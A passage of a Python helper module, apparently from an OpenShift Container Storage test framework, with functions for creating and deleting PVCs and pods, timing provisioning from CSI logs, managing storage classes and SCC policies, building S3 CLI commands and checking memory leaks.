ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(pvc_objs, pod_factory, interface, pods_for_rwx=1, status=""):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
Returns:
list: list of Pod objects
"""
pod_objs = []
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, 'volume_mode', pvc_obj.get()['spec']['volumeMode']
)
access_mode = getattr(
pvc_obj, 'access_mode', pvc_obj.get_pvc_access_mode
)
if volume_mode == 'Block':
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ''
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
) for _ in range(1, pods_for_rwx)]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface, pvc=pvc_obj, status=status,
pod_dict_path=pod_dict, raw_block_pv=raw_block_pv
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image='centos',
source_image_label='latest'
):
"""
Allows to create a build config using a Dockerfile specified as an argument
For eg., oc new-build -D $'FROM centos:7\nRUN yum install -y httpd',
creates a build with 'httpd' installed
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
Defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
Defaults to 'latest'
install_package (str): package to install over the base image
Returns:
OCP (obj): Returns the OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ':' + source_image_label
docker_file = (f"FROM {base_image}\n "
f"RUN yum install -y {install_package}\n "
f"CMD tail -f /dev/null")
command = f"new-build -D $\'{docker_file}\' --name={image_name}"
kubeconfig = os.getenv('KUBECONFIG')
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f'Running command {oc_cmd}')
result = run(
oc_cmd,
stdout=PIPE,
stderr=PIPE,
timeout=15,
shell=True
)
if result.stderr.decode():
raise UnavailableBuildException(
f'Build creation failed with error: {result.stderr.decode()}'
)
out = result.stdout.decode()
logger.info(out)
if 'Success' in out:
# Build becomes ready once build pod goes into Comleted state
pod_obj = OCP(kind='Pod', resource_name=image_name)
if pod_obj.wait_for_resource(
condition='Completed',
resource_name=f'{image_name}' + '-1-build',
timeout=300,
sleep=30
):
logger.info(f'build {image_name} ready')
set_image_lookup(image_name)
logger.info(f'image {image_name} can now be consumed')
image_stream_obj = OCP(
kind='ImageStream', resource_name=image_name
)
return image_stream_obj
else:
raise UnavailableBuildException('Build creation failed')
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example,
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind='ImageStream')
command = f'set image-lookup {image_name}'
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_worker_nodes():
"""
Fetches all worker nodes.
Returns:
list: List of names of worker nodes
"""
label = 'node-role.kubernetes.io/worker'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
worker_nodes_list = [node.get('metadata').get('name') for node in nodes]
return worker_nodes_list
def get_master_nodes():
"""
Fetches all master nodes.
Returns:
list: List of names of master nodes
"""
label = 'node-role.kubernetes.io/master'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
master_nodes_list = [node.get('metadata').get('name') for node in nodes]
return master_nodes_list
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pvc_dict = dict()
format = '%H:%M:%S.%f'
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the end time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(interface, pv_name_list):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
Returns:
pv_dict (dict): Dictionary of pv_name with deletion time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
pv_dict = dict()
format = '%H:%M:%S.%f'
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
start_time = datetime.datetime.strptime(start, format)
# Extract the deletion end time for the PV
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
end_time = datetime.datetime.strptime(end, format)
total = end_time - start_time
pv_dict[pv_name] = total.total_seconds()
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [
i for i in logs if re.search(f"delete \"{pv_name}\": started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], 'csi-provisioner')
logs += pod.get_pod_logs(pod_name[1], 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [
i for i in logs if re.search(f"delete \"{pv_name}\": succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = '%Y-%m-%dT%H:%M:%SZ'
containers_start_time = {}
start_time = pod_obj.data['status']['startTime']
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data['status']['containerStatuses'])):
started_time = pod_obj.data[
'status']['containerStatuses'][container]['state'][
'running']['startedAt']
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data[
'status']['containerStatuses'][container]['name']
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind='StorageClass')
storage_classes = default_sc_obj.get().get('items')
storage_classes = [
sc for sc in storage_classes if 'annotations' in sc.get('metadata')
]
return [
sc.get('metadata').get('name') for sc in storage_classes if sc.get(
'metadata'
).get('annotations').get(
'storageclass.kubernetes.io/is-default-class'
) == 'true'
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind='StorageClass')
if default_sc:
# Change the existing default Storageclass annotation to false
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"false\"}}}' "
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"true\"}}}' "
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def verify_volume_deleted_in_backend(interface, image_uuid, pool_name=None):
"""
Verify that Image/Subvolume is not present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is not present. False if volume is present
"""
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = f"error opening image csi-vol-{image_uuid}"
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = f"Subvolume 'csi-vol-{image_uuid}' not found"
cmd = (
f"ceph fs subvolume getpath {defaults.CEPHFILESYSTEM_NAME}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
return False
except CommandFailed as ecf:
assert valid_error in str(ecf), (
f"Error occurred while verifying volume is deleted in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(
constants.SERVICE_ACCOUNT_YAML
)
service_account_data['metadata']['name'] = create_unique_resource_name(
'sa', 'serviceaccount'
)
service_account_data['metadata']['namespace'] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
scc_users_list = scc_dict.get('users')
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete deploymentconfig pod
Args:
pod_obj (object): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get()['items']
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get('name') == pod_data.get('metadata').get('name'):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get('name'))
dc_ocp_obj.wait_for_delete(resource_name=pod_obj.get_labels().get('name'))
def craft_s3_command(mcg_obj, cmd):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
Returns:
str: The crafted command, ready to be executed on the pod
"""
if mcg_obj:
base_command = (
f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3 "
f"--endpoint={mcg_obj.s3_endpoint} "
f"--no-verify-ssl "
)
string_wrapper = "\""
else:
base_command = (
f"aws s3 --no-verify-ssl --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def craft_s3_api_command(mcg_obj, cmd):
"""
Crafts the AWS cli S3 API level commands
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI API command to run
Returns:
str: The crafted command, ready to be executed on the pod
"""
if mcg_obj:
base_command = (
f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3api "
f"--endpoint={mcg_obj.s3_endpoint} "
f"--no-verify-ssl "
)
string_wrapper = "\""
else:
base_command = (
f"aws s3api --no-verify-ssl --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def wait_for_resource_count_change(
func_to_use, previous_num, namespace, change_type='increase',
min_difference=1, timeout=20, interval=2, **func_kwargs
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample['items'])
if change_type == 'increase':
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f'oc debug nodes/{node_name} -- df'
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(
sc_obj, namespace, number_of_pvc, size, access_modes
):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs, sc_name=sc_obj.name,
namespace=namespace, number_of_pvc=number_of_pvc,
access_mode=mode, size=size)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, 'Bound')
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list, namespace, interface, pod_dict_path=None, sa_name=None, raw_block_pv=False,
dc_deployment=False, node_selector=None
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(executor.submit(
create_pod, interface_type=interface,
pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path,
sa_name=sa_name, dc_deployment=dc_deployment, node_selector=node_selector
))
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(wait_for_resource_state, obj, 'Running', timeout=wait_time)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case
Memory leak is analyzed based on top output "RES" value of ceph-osd daemon,
i.e. list[7] in code
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
More Detail on Median value:
For calculating memory leak require a constant value, which should not be
start or end of test, so calculating it by getting memory for 180 sec
before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__('g'):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__('m'):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__('g'):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__('m'):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
file_path = os.path.dirname(filename)
master_list = get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = 'auth'
check_conf = 'kubeconfig'
node_path = '/home/core/'
if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT,
namespace=config.ENV_DATA.get('cluster_namespace')
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name('dummy', 'osd')
osd_data['metadata']['name'] = dummy_deployment
osd_containers = osd_data.get('spec').get('template').get('spec').get(
'containers'
)
# get osd container spec
original_osd_args = osd_containers[0].get('args')
osd_data['spec']['template']['spec']['containers'][0]['args'] = []
osd_data['spec']['template']['spec']['containers'][0]['command'] = [
'/bin/bash',
'-c',
'sleep infinity'
]
osd_file = tempfile.NamedTemporaryFile(
mode='w+', prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod,
state=constants.STATUS_RUNNING,
timeout=60
)
ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
try:
logger.info('Following command should expire after 7 seconds')
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info('Killing /rook/tini process')
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format='json')
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods, previous_num=1,
namespace=config.ENV_DATA['cluster_namespace'], timeout=120,
selector=constants.TOOL_APP_LABEL
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}", out_yaml_format=False
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
